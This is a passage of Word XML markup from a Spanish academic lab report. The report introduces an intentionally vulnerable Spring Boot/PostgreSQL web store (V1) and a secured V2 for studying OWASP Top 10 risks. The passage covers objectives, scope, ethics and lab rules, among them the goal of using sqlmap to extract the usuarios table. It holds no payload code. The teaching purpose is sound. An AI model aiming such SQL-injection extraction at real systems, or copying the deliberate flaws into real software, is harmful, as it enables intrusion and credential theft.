                <w:b/>
                <w:color w:val="1F6F50"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado: </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">La V1 debe demostrar las vulnerabilidades de forma controlada; la V2 debe conservar la </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>funcionalidad y bloquear los mismos intentos mediante controles de seguridad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B1C7FA0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Palabras</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> clave: OWASP Top 10, SQL Injection, command injection, RCE, IDOR, Docker, Spring Boot, PostgreSQL, sqlmap, pentesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58FAA3" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>1. Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33940D11" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Las aplicaciones web modernas int</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">egran autenticación, bases de datos, carga de archivos, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>APIs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y componentes de terceros. Cuando estas funciones se desarrollan sin controles adecuados, pueden aparecer vulnerabilidades capaces de comprometer la confidencialidad, integridad y disponibilidad </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>de la información. Por esta razón, el proyecto plantea dos versiones comparables: una V1 vulnerable y una V2 sanitizada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C61473" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>La V1 no es un ejemplo de buenas prácticas. Su propósito es hacer visibles las consecuencias de decisiones inseguras, facilitar pruebas</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> reproducibles y generar evidencias técnicas. Cada hallazgo se relaciona con un componente concreto del proyecto y con una contramedida que debe implementarse en la V2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370B605C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>El laboratorio se orienta a un contexto académico y autorizado. Los procedimientos desc</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ritos solo deben ejecutarse sobre localhost, una máquina virtual aislada o una red de prácticas con permiso expreso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C886E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>2. Objetivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268ACA17" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>2.1 Objetivo general</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35779DF0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Implementar, desplegar y documentar una aplicación web intencionalmente vulnerable que permita identifica</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">r y demostrar de forma controlada riesgos del OWASP Top 10:2025, incluyendo SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatizada con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y extracción de credenciales de laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F2C1E6" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Objetivos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específicos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="240579DC" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Desplegar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y base de datos como servicios </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">separados mediante Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Compose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0120B695" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Documentar la arquitectura, las tecnologías, los puertos y el flujo de las peticiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F091472" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicar la organización del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spring </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Boot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">, el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> estático y el esquema PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A623A98" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Reproducir fallas de acceso, configura</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">ción, criptografía, inyección, diseño, autenticación, integridad, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y manejo de excepciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256ED514" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejecutar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> contra el parámetro vulnerable q y obtener el contenido de la tabla usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F11D7C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Definir las contramedidas que servirán como criterio de </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>aceptación para la Versión 2 segura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6804E0E1" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Alcance, ética y restricciones de uso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3418D8" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>El alcance comprende la ejecución local de la tienda, el análisis del código fuente, la explotación controlada de sus vulnerabilidades y la documentación de resultados. No compre</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>nde pruebas contra sitios externos, redes institucionales, sistemas de terceros ni servicios de producción.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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="3F843CC9" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="9E2A2B"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FCE8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A9C8AC" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="9E2A2B"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Advertencia crítica: </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">La aplicación contiene vulnerabilidades reales. Debe permanecer enlazada a 127.0.0.1 y no debe publicarse en Internet, abrirse </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">mediante </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>forwarding</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> ni exponerse a la red local sin un entorno de laboratorio aislado y autorización expresa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F1CBDBD" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="120" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>Reglas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>laboratorio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CA7E9E2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Ejecutar las pruebas únicamente contra 127.0.0.1 o localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C43DFE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Usar datos y credenciales ficticias incluidos en el</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B30A3" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Emplear comandos inocuos como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">, id o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> para demostrar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD59E53" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">No convertir el laboratorio en un servicio público ni reutilizar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> contra terceros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727D070" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Detener los contenedores al terminar la sesión y conservar las evidencias</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> sin datos personales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D741CF3" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
